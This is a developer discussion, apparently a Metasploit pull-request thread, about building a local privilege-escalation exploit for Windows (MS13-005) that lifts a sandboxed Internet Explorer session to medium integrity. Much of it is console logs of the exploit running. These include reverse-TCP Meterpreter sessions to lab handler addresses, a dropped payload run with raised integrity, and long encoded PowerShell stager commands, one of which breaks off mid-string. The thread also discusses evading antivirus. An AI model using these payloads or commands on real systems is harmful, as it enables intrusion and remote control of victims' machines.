Exploits MS13-005 - Low Integrity to Medium Integrity Local Priv Esc

[Meatballs1]

Tested on IE8-Win7 VM from: http://www.modern.ie/en-US/virtualization-tools#downloads

Its pretty fun to watch: http://www.youtube.com/watch?v=Vw8ylvTOlBQ

Also tested on the Vista but that doesn't support the spawning of a shell as no shortcut so the only attack vector there is if the victim spawns a cmd prompt (or powershell) for you.

To test:

icacls meterp.exe /setintegritylevel low

ProcExp can tell you if a process is medium or low integrity for success.

Possible Improvements:
The low integrity check could possibly be refactored into Post::Accounts? But that's pending in another PR. It would also benefit from being railgunned.

Would the typing go faster if we did a multi railgun call?

Could add an option to just write the whole payload command rather than web download - but you'd definitely want to time this for the small hours of the morning. I expect that'd be better in a separate module? If we're getting in as a low integrity process we probably exploiting IE anyway so have web access...

[jvazquez-r7]

Processing!

[jvazquez-r7]

First test has not been successful

[*] Current server process: iexplore.exe (2924)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 164
[+] Successfully migrated to process 

msf exploit(ms13_037_svg_dashstyle) > use exploit/windows/local/ms13_005_hwnd_broadcast 
msf exploit(ms13_005_hwnd_broadcast) > set session 1
session => 1
msf exploit(ms13_005_hwnd_broadcast) > show options

Module options (exploit/windows/local/ms13_005_hwnd_broadcast):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   SESSION       1                yes       The session to run this module on.
   SPAWN_PROMPT  true             yes       Attempts to spawn a medium integrity command prompt
   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL for incoming connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion    SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                        no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(ms13_005_hwnd_broadcast) > set SRVHOST 192.168.172.1
SRVHOST => 192.168.172.1
msf exploit(ms13_005_hwnd_broadcast) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(ms13_005_hwnd_broadcast) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms13_005_hwnd_broadcast) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(ms13_005_hwnd_broadcast) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://192.168.172.1:8081/z63EC17E
[*] Server started.
msf exploit(ms13_005_hwnd_broadcast) > [*] Running module against WIN-RNJ7NBRK9L7
[-] Exploit failed [not-vulnerable]: Not running at Low Integrity!

The process is indeed low integrity:

Was a "blind test", now digging into the code, etc, etc.

[jvazquez-r7]

Don;t think its neede for the exploit, is it?

[jvazquez-r7]

Screenshot of the exploit working! It is kinda cool :)

Just need to work on the low_integrity check thing... digging

[Meatballs1]

Main issues with running this test is:
The spawned command prompt has to be visible on the taskbar to spawn a medium integrity command prompt - I attempt to grab the main window and make it visible so the prompt isn't hidden etc.

You can disable SPAWN_PROMPT and create a cmd prompt yourself to see if the broadcast messages are being captured. If they aren't your machine isn't vulnerable!

I guess I could do an md5 check on the appropriate dll or version and implement check

[jvazquez-r7]

And it's what happens when running the integrity check from an IE low integrity process (notice the Low subdir):

msf exploit(ms13_037_svg_dashstyle) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > cd %TEMP%
meterpreter > pwd
C:\Users\JUANVA~1\AppData\Local\Temp\Low
meterpreter > mkdir test
Creating directory: test

Indeed:

C:\Users\JUANVA~1\AppData\Local\Temp>icacls Low
Low NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
    BUILTIN\Administrators:(I)(OI)(CI)(F)
    WIN-RNJ7NBRK9L7\Juan Vazquez:(I)(OI)(CI)(F)
    Mandatory Label\Low Mandatory Level:(OI)(CI)(NW) <-- 

When the intended test is:

meterpreter > cd ..
meterpreter > pwd
C:\Users\JUANVA~1\AppData\Local\Temp
meterpreter > mkdir yup
Creating directory: yup
[-] stdapi_fs_mkdir: Operation failed: Access is denied.

So this test doesn't look useful for IE, working on it....

[Meatballs1]

Doh... WE could just expandpath and look if the tempdir ends in Low, hmmm doesn't work.

[jvazquez-r7]

Hi @Meatballs1,

I've tried to address the thing on Meatballs1#6

Mainly:

• Modifies the check for the integrity Level, to allow false negatives when running in sessions from exploited LI IE processes. Basically it tries to write to the User Path, and not to the TEMP path. Let me know if it has sense for you.
• On the other hand, since on sessions got from exploited IE sandboxed processes, the %TEMP% folder points to a writable LI folder, I guess there will be similar situations. And I have added the option to drop the payload to fs and execute it. Maybe can be useful in some situation. Anyway I like the idea of using Powershell and HTTP. So by default I've kept your original exploit vector. Just added the option for the user to drop it to FILESYSTEM. Let me know what do you think :)

Test for the FILESYSTEM option:

msf exploit(ms13_037_svg_dashstyle) > [*] 192.168.0.3      ms13_037_svg_dashstyle - Requesting: /jKfqUIRkG5LFEtb
[*] 192.168.0.3      ms13_037_svg_dashstyle - Sending HTML to info leak...
[*] 192.168.0.3      ms13_037_svg_dashstyle - Requesting: /jKfqUIRkG5LFEtb/EdjExhKoxa?cQDDi=2009624752
[*] 192.168.0.3      ms13_037_svg_dashstyle - Using ntdll ROP
[*] 192.168.0.3      ms13_037_svg_dashstyle - Sending HTML to trigger...
[*] Sending stage (751104 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:49713) at 2013-07-26 14:50:57 -0500
[*] Session ID 1 (192.168.0.3:4444 -> 192.168.0.3:49713) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (880)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3920
[+] Successfully migrated to process 

msf exploit(ms13_037_svg_dashstyle) > use exploit/windows/local/ms13_005_hwnd_broadcast 
msf exploit(ms13_005_hwnd_broadcast) > set FILESYSTEM true
FILESYSTEM => true
msf exploit(ms13_005_hwnd_broadcast) > set SESSION 1
SESSION => 1
msf exploit(ms13_005_hwnd_broadcast) > rexploit
[*] Reloading module...

[-] Handler failed to bind to 192.168.0.3:4444
[*] Started reverse handler on 0.0.0.0:4444 
msf exploit(ms13_005_hwnd_broadcast) > [*] Running module against WIN-RNJ7NBRK9L7
[*] Trying to drop payload to C:\Users\JUANVA~1\AppData\Local\Temp\Low...
[+] Payload dropped successfully, exploiting...
[*] Spawning Low Integrity Cmd Prompt
[*] Bruteforcing Taskbar Position
[+] Spawned Medium Integrity Cmd Prompt
[*] Broadcasting payload command to prompt... I hope the user is asleep!
cd C:\Users\JUANVA~1\AppData\Local\Temp\Low && icacls EbjVUS.exe /setintegritylevel medium && EbjVUS.exe
[*] Executing command...
[*] Sending stage (751104 bytes) to 192.168.0.3
[*] Meterpreter session 2 opened (192.168.0.3:4444 -> 192.168.0.3:49728) at 2013-07-26 14:52:45 -0500
[*] Session ID 2 (192.168.0.3:4444 -> 192.168.0.3:49728) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: EbjVUS.exe (400)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1104
[+] Successfully migrated to process 

The new 1104 process is indeed MI:

Feel free to review, test discuss anything. Once it's handled I guess we'll be ready to land this one! :)

thanks!

[jvazquez-r7]

Thanks @Meatballs1 , landing!

[jvazquez-r7]

not still :P giving time to @Meatballs1, work on progress on his side! :)

[Meatballs1]

I tried mutli railgun call but currently Meterpreter crashes - I cant find any examples anywhere at the moment of this in use?. Theres also a bug in that the multi handler doesn't handle 'CONSTANTS'.

I've added 3 technique options:
WEB/FILE you are familiar with
TYPE - This types out the powershell command line as per psexec_psh or a custom command of the user's choosing - it is your fallback option when you cant egress and av is picking up your files (although a .ps1 is less likely to get picked up).

Currently the powershell command line did not work in my environment - I need to check on this... [Edit] Just retried it and it worked fine...

Importing the Powershell library it is obvious that some of the datastore options are ambiguous (e.g. PERSIST) so I have added PSH:: infront in a similar fashion to EXE:: to give them some provenance

[jvazquez-r7]

Is anyone (module/mixin) using this option. Can you just rename it without other code modifications :?

If it's the case I ask myself if this datastore option is really needed, just asking :)

(Same happens with PUSH_OLD_METHOD and RUN_WOW64).

On the other hand, if further code modifications are needed to change it, please don't change it in this pull request. Try to not modify mixins and/or libs when doing a pull request for add a module. It's easier to handle modules out of mixins/libs/core changes.

[Meatballs1]

As far as I'm aware the only module using it at the moment is smb/psexec_psh:

grep "Exploit::Powershell" agrees!

[jvazquez-r7]

And the same mixin doesn't use the datastore options :?

[jvazquez-r7]

The Exploit::Powershell mixin I mean

[Meatballs1]

I'm not sure I understand the question?

[jvazquez-r7]

I'm sorry, trying to explain better. The Exploit::Powershell mixin is accessing datastore['PERSIST'], datastore['PSH_OLD_METHOD'] and datastore['RUN_WOW64']. My question is, are the old options names compatible with the new PSH::PERSIST, PSH::OLD_METHOD and PSH::RUN_WOW64? If not, I guess the code from the Exploit::Powershell mixin should be modified to use the new options names.

[Meatballs1]

Doh, yes I'm being daft

[jvazquez-r7]

Okey, I can land this change in this pull request. But please, in the future, when changing libs/core code use a different pull request than the one adding a module. It's a perfect example, where a core mixin is being modified, and this modification can be handled independently of the mode addition. Just to have into account in the future, please :)

[sempervictus]

#2075 addresses the powershell stuff... we're currently running into the mismatch from using an old codebase for all of this. I keep running into this whenever i want to write something for framework trunk using PSH since that PR contains a slew of methods for working with it.

[jvazquez-r7]

Processing, the TYPE attack vector is taking a really long time, more than I expected. Will update in a while, giving the chance....

[jvazquez-r7]

After all.... the TYPE method didn't work here:

msf exploit(ms13_005_hwnd_broadcast) > set session 1
session => 1
msf exploit(ms13_005_hwnd_broadcast) > rexploit
[*] Reloading module...

[-] Handler failed to bind to 10.6.0.165:4444
[*] Started reverse handler on 0.0.0.0:4444 
msf exploit(ms13_005_hwnd_broadcast) > [*] Running module against WIN-RNJ7NBRK9L7
[*] Spawning Low Integrity Cmd Prompt
[*] Bruteforcing Taskbar Position
[+] Spawned Medium Integrity Cmd Prompt
[*] Broadcasting payload command to prompt... I hope the user is asleep!
msf exploit(ms13_005_hwnd_broadcast) > jobs

Jobs
====

  Id  Name
  --  ----
  1   Exploit: windows/browser/ms13_037_svg_dashstyle
  2   Exploit: windows/local/ms13_005_hwnd_broadcast

msf exploit(ms13_005_hwnd_broadcast) > 

[*] Executing command...

On the CMD:

C:\Users\Juan Vazquez>%COMSPEC% /B /C start powershell.exe -Command "$si = New-Object System.Diagnostics.ProcessStartInfo;$si.FileName = \"powershell.exe\";$si.Arguments = ' -EncodedCommand JABzAHQAcgBlAGEAbQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAZQBOAHEAZABWADEAMQBQADIAMABvAFEAZgBVAGYAaQBQACsAeABGAFAAQQBRADEAUgBFAG4AOABrAFUAQgAxAHAAVgBKAGEAQwByAG8ARQB1AEEAawB0AHQAMABSADUAcwBOAGQAagA0AHUASQB2AHIAZABkAE4AUQB0AFgALwBmAG4AZgBHAFcAYwBjAE8AbQBGAFoARgBZAHUATgBkAHoANQB3ADUAYwAyAFoAMwB2AFQAcwBCAGUAVABpAFIASQB1AEIAeQBsAEgAagBBAEQAcgArAEEAeQBJAEkAawBaAHYAMwBkAG4AZgAxAGwAbAB0ADUAZQB2AGUAZAB6ADkAagBkADcAdAA3AGUANwBrADIAZABCAC8ATQBBAG0AcQAwAHgAQwA5AEwAYgBlADcAWQB6AHoAVwBBAFkAUgBkAEMANQBpAEMAUwBKAEoASgB5AEMAKwBCAHgAdwB5AFoAUgBZADcARQBXAFMAcAB3ADQARQA5AEMAZAArAC8ALwAzAHcANwBPAG0AYwAvAGQAbgBmAFMAMwBBADAARAB6AG4AagBvAFoAQgBuAHoAOAA1AGoAagA0AFAAUQBzAGQAQgA2AHkARwBWAHUALwBoAEQAaQBQADIARQBrAFkASgB0AHkAUgBpAHQAUAB0AEsAZwBYADIAZwA1ADAAbQBVAFIAUgBJAHgAYQBtADcANwBIAFcANwAzAFQAWQBiAFEANgBiAEMAQQBZADMAMAAxAFEAagA3ACsAVABMAFMAQwBLAEoARQByAEcANQBFAEkAbwBFAGoAbgBzAEwANgB1AEEAUwBlAFMAeABpAEQANAA5ADIASgBRAEIAWQBZAFoAaQBQAEMAcgBVAHEAUgBIAGIATQA4AGkASwBWAHkAdgBvAGoAOQBJAE4AWgBPAFoAKwBzAC8AYwB2ADAAUQBoAGgAZABSAG0AZwBqAFoAMgBuAHMARQBFAFUATgBvADkARAB0AGUARwBPADQAZABsAEgAQwBaAFYAQwBrAHAAMQBLAFcAUwBLADEAWgBJADgAawBZAEsAOQBpAFUAUQBNAG4AZABDAHkAcgBpADEASABnAHYAVABFADgAOABUAGsARwBYAHQASQBxAHkAMwBtAEEAUgBQAHMATwA3ADQAWQBWADIAZABjAG4AaQBkADUATQBIAGIAUAB5AGQAegBLAHMAQwBSAGMARAB0AFgAUAA5ADYARwBUAE4ARQAvAGsAVwByAEcAdQBFAHEANABDAGkAdgBwADgATQBlAEMAVwBtAG0AcwB4AG8AUQBzADYAWgBmAEQATgA0ADUAUQBjADAATABGAEsAcAAwAHAAbABzAHEAQgBKAEsAOQBZAEYAdABFAHUAdgBEAC8ASwBBADYASAB2AG4ARQBDAGUASgBXAEsAaQBaAG0AbwBJADEAKwA0ADMAcABZAG4ATwBaAFgANwB1AHgARgA2AG8ANgBGAEoAUgB2AGMAVQBvAEMATQBNAGcAQQA1ADcARQBYAG8AYgB4AGYAbQBJAGwAOQA5ADcAdAA3AHEAaQBGAGsARAAyAGwASAB2AGoALwBQAGUAYQBmAFYASwAyAHYAWQBIAEYAWQBRAEwARgBSAHcARQBXAFMASgBiADcAcwBuAEUANwBtAGoAawBqAFgAUAA2AGQAcQBKAGEAawBLAGYAQQA4ADgARQBNAHEAYgB5ADIAaQA4AFQASgBQAG8AYQBUADUAYQBaAEgAVwBBADkAZQBwAEIAaAB3ADgASgAvAGsAWgBwAEUASQBJAG8ASAAwAHEAcABzAG0AMgBjAHoAaABoADgARQBCAEIAegA4AEUANgB5AEQAQwBJAGwAQQBHAFEAZABKAGYAYgBZAGkAUgArAGcAOQBhADYAMQB0ADgAWgBHAGkAZABwAHMAZQBwAE0AVgBJAFcAZQBkAHQAZgBtAHEAYwA3AG0AZQBPAFEAYwBIAHoAOABBAC8AUQBRAHgAQwBsAGYAOABpAEwAaABhAE4AWQByADEALwBLADMASgBRAGgAdgBtADUAZQAzAEwAMwBPAEwAbgAvAGkAbQBNAGIAWQBUAFIAbABqAFgANABtAGsAbQBpAFMANQBJAEoARABxADQANwBkAFoAdQBXACsAYwBvAEQAaQBUAHQAKwB2AEoARQB4AG4AcwAvADMAbABQADgARQBvAEUASQB2AHgASwBuAEMAdgByADAAUgBLAHEAOAByAG4ANwBlADQAUwBoAHEAbwBaAEgAcQBtAG0AVwAvAG0AMwB1ADMAbwBVAEwATgBVAFkAUABkAHkAdwB0AGkARABlAEkASQBiAFgAUgAyAHMAVAByAFYAMwBWAFcATgBnADEAdQByAFUAdQAzAC8AUwBhAFUASABvAGwAdwBBAEEAOQArAHMAagBKAFYALwAvAHUAUQBEAFcAbQBnADAATQAyADAAYwBCAHgAdgB3AG0ARgBYAG4ATQBNADcAbQBCAE0AQQB4AHMAYgB4AHcAYgA0AFIATQBEADAAZwBCAGEAOABNAFMATwBPAGcAVAAzADEAVAAyAGgASQBBAE4ARABWADcAKwBwADgAcgBNAEYAdgBKAEYAUgBLAFkAUABZADEARgBjAFQAegBOAHUAUAA0AE4AQwBEA HgAcgBVAFkAcQBaAEcATgBxAEQAVQBvAEEAYQA0AE8AQwBBAEQAMQBDAGMAWgB0AFEAcgBLAEYATwBtAGcAQQBNAHoATQBqAFEAcABNAHcAagBEAFcAVwBZAHIANgBLAFEAYgA2AFUASQA3AFcAZAA2AGMAKwBxAFMAZQBxACsAQgBrAEsAUQBHAGMAZwBKAEsARAArAGUAWABqADcARwBSADAAdwBDAEYAOQAvAEcAbAAwAGMAaQBFAGIAUABxAG0AOQBxAFgAcQBXAE0ATwB5AEoAawBQADkAdABzAGkAMgBDAGMAVwAyAHQAUQBmAEoANABOAGIAOABlADcAeQBxAFYAcgBNAG8ANQBiAFQAZAAxAEIAYgAxAE4ARQAzAE4AZwBSAHEATABjAEIAdABCAGEASQBwAGEANgBHAGQAaABsAGEAMQBTAFgAOQBLAEgAKwBGAGkAKwBmAHYAdABLAGcAVgBBAEgAbwBEAHcAdwBOAFEAdABWAHMAawBsAEoASwBuAGEALwB1AHIAcQBIAGoAZABwAGkAYwBRAGEAbABRAHgASABYADEARQBnAG0AeQBrAEkAbQB0AEIAdwBIAFQAUwBqAEUAMwBzAFAAaQB1AE8AaAAyAHAATwBlAGUAagB0AC8ASABaAEQAbABKAFkAegBiAE8AMgBxADYATwBTAHQAWgBEADYAcgBwAHIAZwBFADAAQQBxADEAZwBQAHIANgBKAFEAWQA3ADcAdwBSAFAARABnAHIARABjAGIAcgAzAEYAagBnAFgAcgBNAEkAMQBUAEEAcABsAHAAcABFAE8AeQBnAEoASQAxAEUAbgBOAEoAVQBGADYASgBIAFoAZQBmAGwAUABtAHQAcgAwAEYANQB6AE4AcgBiAGUAZgBnAGoAcABDAFAAMABJAG0AUABZAEkAdQAxAGQAagArAFQAdgBiAEMAdABjAGUASgBxAEIASAB1AGEAUwA0AEQAdQBFADMAYwBuAEgAUgAwAEsARgBKAFkAdABmAGkAVQBnADUAZAAvAFUAQgBGAHQAaABzAFQARwBsAFIAVgA4AFcAaABhAGwAUABPADkAawBnAHIAdABUADQAMABvAFIAYQBDAHkAbwBDAFIAdQA5AFcATgBtAGwAZABJADIAWgBrAE8ATwB0AE4AUQBjAFkAbQB6AG8ATAAxACsAbAA2AG8AWgArAFkAVAB0AE4ATQBHAFUAMABzAHYAdABGAGQAbwAyAGYAVgBFAHQALwBmAEkAeAB5AHIAZABCAG0AUgBYAHoAcwBXAHAARwA0AFEAVQBlAG8ANgA2ADgAZgB2ADQAMABDADcAMQAvADMAYwB1AEwAZgBmAEYAQQBmADkAMgBsADUASABlAGoAZwA4AFgAOQAyAGYARgB3ADcALwBuAGIAeABuAEYAQwBQADMAYgBtAEUAKwBFAEgATwAyAFIAdgBXAGEAMgArADcAdgA2AGsAZgBoAEIAVwBhAHYAaABVAGMAdQB0AGYAaQAxADkAYgBGAHAAZQBJADUANwBQAGEAZABRAFoAbAB1ADMAeABuAFUASwBTAGIAdwBXAFcAdgA2AFAAawBuAEMAMgBWADkAYgBpAFIANgBvAGUAOABMACsAUQA1AGkANABUAG4AaQBzAGoAcwBGADUAaQBCAGMAWAA0AHkAMABUAEkASABOADEAUgBzAFgATAB3AHUAcwAzAHEATQA3AEkARQBkAG4AYwBDAFkAbABqAHUAbQBwAHQAaQA5AEoAbQBxAEYAUQA5AGEASwBOADAAaQB1AHEAMABPAFAANwBPADIAUAA3AGkAOAB2AFAAbgBQAEgAbQA2AGYANwBoAGYAdgBGAGkATwAyAGcAVgBBAFQAWgB2ADIAZABoAFEAYwA2ADIANQBsAFgAdwBGADkATQBmAFYAQgBOAGYAWAA5ADcAeABkAHAAYwB2AG4AMABUAGUAVAAzAEwAegBKADQANgBmAFIAZQBqAGYAQwA4AFgASABpAFcAVgA0ADcANgBaAHEAYgBJAC8AUQA5AFcAbQBLAFUAMAAnACkAKQApADsAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAQgB5AHQAZQAoACkAfABPAHUAdAAtAE4AdQBsAGwAOwAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZABCAHkAdABlACgAKQB8AE8AdQB0AC0ATgB1AGwAbAA7ACQAKABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAJABzAHQAcgBlAGEAbQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApADsA ';$si.UseShellExecute = $false;$si.RedirectStandardOutput = $true;$si.WindowStyle = 'Hidden';$si.CreateNoWindow = $True;$p = [System.Diagnostics.Process]::Start($si);"         

BTW: In case could be related, it took really a long time to broadcast the full command!

[jvazquez-r7]

I've been reviewing other mixins using these type of names for datastore options. As far as I've checked there isn't an strict naming style for these type of options. I find:

• UPPERCASE::CamelCase
• UPPERCASE::snake_case

But never UPPERCASE::UPPERCASE. I'll be switching them to UPPERCASE::snake_case if anyone stops me, since snake_case is preferred for naming variables on ruby.

[Meatballs1]

Its probably best if I revert these changes from this module, and these comments should apply to #2075 ?

[jvazquez-r7]

Agree, it's probably better if you could revert these changes from this pull request. Indeed they aren't needed for the module to work.

[jvazquez-r7]

About the TYPE method, getting the command line, stopping the exploit, starting a handler and typing the command line on a Windows CMD manually, works:

msf exploit(ms13_005_hwnd_broadcast) > set LHOST 192.168.172.1
LHOST => 192.168.172.1
msf exploit(ms13_005_hwnd_broadcast) > rexploit
[*] Stopping existing job...
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
msf exploit(ms13_005_hwnd_broadcast) > [*] Running module against WIN-RNJ7NBRK9L7
[!] WARNING: It can take a LONG TIME to broadcast the cmd script to execute the psh payload
[*] %COMSPEC% /B /C start powershell.exe -Command "$si = New-Object System.Diagnostics.ProcessStartInfo;$si.FileName = \"powershell.exe\";$si.Arguments = ' -EncodedCommand JABzAHQAcgBlAGEAbQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAZQBOAHEAZABWADIAMQBUADIAegBnAFEALwBzADQATQAvADAASABIADgAQwBGAE0AUQB5AGEASgBYAHgASgBnAGIAcQBaAEEATABpADAAdABLAFQAVABKAEEAVwAwAG0ASAAvAHkAeQBKAGkAWgArAHkAYwBrAHkASgBIAFQANgAzADAAKwA3AGoAaAB3ADcARgAzAE8AZABNAG8ATgBpAHkAYgB2AFAAUAB2AHUAcwBKAEUAcwBqAEUATQBjAGoAdwBYADEASABEAEcASQBYADIAUABFAGQAOABNAFMAUABJADkAYgBlADMAegB2AGsAOQA3AFoAdwB4ACsAUAB2AHMANwB2AG4AOAArAFgATABCAGYAdQBUAHYAVAAvAFkAMwAwAHMAVABQADMAcABrAG8AMQBVAGkASQBEAHcAcgBkAHgAdgBEAE4AQgBKACsAQwBJADIAcgBTAEEAQwBQAEYAeQBQAGcAegA3ADQARABpAFQAUwBMAHIAQgBDAFMAaABlAFUAQQBlAC8AMAA0AGYATABLAHYAVgB3AHYAMwBVADIAOQB3AHoAMwA3AHMANwB5ADEAUwBPAC8AQQBkADUAZwBSAFcAawBqAEEAdgBqAFIAdwBjAG4AUABRAEQANgB6AEcAWgBzAHYAVgBMAGkATgBLAFEAbgBRAGQAQgA3AEYAaABDADAAaAB1AHYARgBzAEIAKwBzAE0AcwA0AEQASAAwAGgAZQBUAFcAWAByAFcAYQB6AFcAVwBkAEQAUwBHAFIASQBvAEoARwAyAEgARwBFAC8AZAB5AE0ATgBJAEkAegA1ADYAcABiAEgAQQBoAHoARQBrADEAaAAvAEwAYwBGAEoAQgBRAHoAQgBjAHUAKwA1AEwAegBJAE0AdgBSAEoAaABMAE4ATgBrAHAAeQB6ADEASQB5AEcAZAByAHkATABQAGoANQBSAFQAZgAvADEASAByAHIAMABnAHUAQQBvAFgATQBSAGUAMQBnAHoAbgB3AEMAQQBLAHQAMwBYAEMARAA0AE8AQQBvAGgAMAB1AEUAVABFAG0AaQBMAHEAVgBrAGsAVQBRAFMAdAA0AEsAegBPADUAKwBMADEAQQBvAG8ANAA5AHAANgBMAEYAaQBjAHUAeQA2AEgASgBLAGwAbgBZAGQAMgBYAGsAZgA4AEsANgA0ADQAWABsAE4AWABKAGgAOQBkAEoASABwADMAOQBQAHAAbABMAEQAcABhAEEAOABVAHoAKwB1AEIAcwB5AFcAZgA5AGMAeQBNAGwAagBTACsARQBLAHIASQBUAGwAegBEAE4AcQB1AGIARQBjADQAeQBLAG4AbgB3AC8AZgBXAGwAegBPAEMAeABrAHIAZAA2AFoAWQBNAGcAZQBTAHYARwBDAFoAUgBiAHQAeQBmAHkAcwBQAGgATAA2ADMAZgBOAEcAUAArAFUAagBPADEAZwBCAHUANwBDAGUAcABpAGMAcABsADkAdABHAEsAMwBFAEQAUwBwAGEASwA2AEwAdwBNAC8AQwBQAHcARQBuAEQAaAB5AEUANAB6ADMARQB5AHQANQA4AEgANQAvAFQANgA2AEoANwA5AC8AaQBsAC8AaABwAEQAcgAyADcAegA2ADkARAB2AHkAYwBMAC8AZwBWAGUAagBqAE0AOABOAHYAQQBkAEgAaQBlAHgASgB4AHEAWABvADUAbgBGAEYAKwB1AGYAUwA3AG0AeQBaAEIAbQBlAGYAUgBlADQAaABMAGkAWgBMADkAeQA3AHoAMgA3AHYAcQB1AHkAOABYAGsASgBvADMASQB2AHgATgAxAHoANABBAGYARAA4AEkAZABjAHEASwBXAEkAMABoAHUAQQBCAGgAOABnAEIAOQB6AHgASgBJAEoAVABaAFEAOQBLAFEAUwBnACsAdAA2AEIARgBxADcAMgBzAEgAYQAxAHoAVQBwADgANABtAHQAMABrAFcAYgB0AHAAWQBtADYAOABhADEAKwB0AHAAYwAzAFIAVQBBAHYANABBAEUAWABCAFoAOQA2AHMAbwBXAHkAMgBTADcAZQBHAFkAcAB5AEMATgB2AG4ANwB3AGcAdgBEADcAcABUAC8AegBlACsATgArAGkAaQArADIAWgBGAEcAawBWAFkAdwArAGoAOABOAFIAbgBIAEkASABhAHAAcwBJAGQAYgBhADkAdwB4AHkAaAB4AEoATwBMAGwAWQBEAEoAZABIAHAAbwB1AGEAcwA1AEIASgA4AGUAZQBlAC8AcgBwADMAUQArAHAAcgBYAGwATwBmAFgAbQBFAHIAcQB5ADYAWgA3AEkAcABsAG4ANABOADUAdABxAEYAQQB6AFoAYQBDADEASgBkAEIAdgBpAEgAVwBLADQAYgBiAFQAVwAwAGQAcQBXAGoAWQBGAGQAcgBWAG4AcQBPAHAAdABlAEYAVQBvAHIAQgArAGkAZwBSAHgAcwA1AGUAZgBMAGYANwBzAGgARwB0ADMARABJAEoAQgBvADQANwBsAFcAaAAwAEcAcwBIAGcAMQBzAFkAVQA4AFAARwB4AEwARQBPAFAAaABFAHcAUABhAEMARgBVADUAbQBSAGcANABGAGQAKwBVADkAbwBTAEEARABRADEAVwB1AHEAZgBJAHoATwBMAHkAUwBVAFMANgBDADMARgBSAFgARQBjAHoAZgBqACsATgBRAGgAOABZADEASwBLAG0AUwBqAEsAdwAxAHkAQQBHAE8ARABnAGcAQQB0AFEAcgBHAHIAVQBJAHkAdQBTAHAAbwBBAE4ATQB4AEkAVQA2AFQAMABFAHcAVwBsADYAVwArAGkAawBHACsAaABDAFAAWAAvADYATwAxAFEAbAA5AFIANwBDADQAUQBrADEAWgBBAFQAVQBIAG8ANAB2AHoAeQBNAGoAWgB3ADYASwBMAHkASABMADcAVgBLAEoAbQBUAFQAMQBwAFUAdgBWAGMAZgBvADUAagBYAHAAcQByAGQAWgB0AGwAVQBvAHAAcQBrADgAUwBBAGEANwA1AE4AOQB5AGkAbQBwAFYAaQA1AEoAUAAyADAAMQB0AFUAVQA5AGQAVgB4AHkAbwBNAFEAaQAzAEUAbwBTAG0AcQBJAEYAKwBCAGwAYgBaAHkAUABVAGwAZgBZAGkAUAA0AGEAbQAzAGIAeABRAEkAZABRAEQASwBBADEATQB6AFUAQwBXAFQAbABLAFIAaQB0ADQAdQByAHUAMQB1AHAATABSAGEAbgBrAHoAdABrAGMAWABXAEYAcABLAE0AcwBaAEUATABMAHMAVgBPAEYAUQB1AHgAZABMAEkANgBOAGIAaQBkAHEANwBxAG4ANABiAFUAegBXAEkAVwBuADAAeQBsAG4AYgBWAEYASABKAHUAawB0AGQAZQB3ADIAdwBDAFcAQgBrADYAKwBGAE4ARgBHAHIAMABIAFUAOABFAEQAOQBaADYAcwAzAEUAcgBOAHgAWQBvAHgAegB4AEIAQgBVAHkAcQBsAFEATABKAFYAawBHAFgAbABzAEoAYgBrAHoAOQBMAGEASgAxAEYAaQB3AHIAdgA1AEQAdQB0AHEAVwBCAGIAMQBmAG0AWQBhAGcATQBpAHAAQgBQADAAcwB3AHkAMQBTADUAaQB0AEUAcwA5AGYAMgBWAGcAYwA1AGEARQBEAGUAdQBTAEwAeQBsAEUAaAB2AEUAbwB1AE4AaABwAGEATgBFADMATQBVAGwAegBLAG8AYQBrAGUAcQBNAHgAbQBaAFUASwBkAG8AaQBvAHUAVABZAHgAOAB4AGgAZABTAG8AUgAyAHEARQBpAFUATABsAEoAZQBVAHgAQwAxACsAegBvAHgAYwAyAHMAcABzAHkASgBFAFcAbQAwAFcATQBOAGYAWAB0AEsAOQBSAGQAVQB5ADkATQBxAHcAbwBtAGoAMABaAD